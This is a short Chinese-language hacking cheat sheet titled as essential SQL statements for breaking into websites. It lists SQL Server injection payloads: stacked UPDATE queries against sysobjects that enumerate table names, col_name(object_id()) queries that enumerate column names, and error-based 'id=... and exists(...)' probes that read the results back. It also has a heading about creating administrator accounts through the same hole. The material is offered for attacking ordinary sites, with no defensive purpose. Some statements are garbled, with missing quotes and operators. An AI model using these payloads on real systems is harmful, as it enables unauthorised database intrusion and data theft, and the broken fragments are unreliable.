入侵网站必备Sql语句:(经典语句)

核心提示： 枚举出数据表名;update aaa set aaa=(select top 1name from sysobjects where xtype=u and status>0);--这是将第一个表名更新到aaa的字段处，读出第一个表，入侵网站必备Sql语句:(经典语句)(7)，第二个

枚举出数据表名

;update aaa set aaa=(select top 1

name from sysobjects where xtype=u and status>0);--

这是将第一个表名更新到aaa的字段处。

读出第一个表，第二个表可以这样读出来（在条件后加上 and name刚才得到的表名）。

;update aaa set

aaa=(select top 1 name from sysobjects where xtype=u and status>0 and

namevote);--

然后id=1552 and exists(select * from aaa where aaa>5)

读出第二个表，一个个的读出，直到没有为止。

读字段是这样：

;update aaa set aaa=(select top 1

col_name (object_id(表名),1));--

然后id=152 and

exists(select * from aaa where aaa>5)出错，得到字段名

;update aaa set aaa=(select

top 1 col_name(object_id(表名),2));--

然后id=152 and

exists(select * from aaa where aaa>5)出错，得到字段名

[获得数据表名][将字段值更新为表名，再想法读出这个字段的值就可得到表名]

update 表名 set 字段=(select top 1

name from sysobjects where xtype=u and status>0 [ and name你得到的表名

查出一个加一个]) [ where 条件] select top 1 name from sysobjects where xtype=u and

status>0 and name not in(table1,table2,…)

通过SQLSERVER注入漏洞建数据库管理员帐号和系统管理员帐号[当前帐号必须是SYSADMIN组]

[获得数据表字段名][将字段值更新为字段名，再想法读出这个字段的值就可得到字段名]

update 表名 set 字段= (select

top 1 col_name(object_id(要查询的数据表名),字段列如:1) [ where 条件]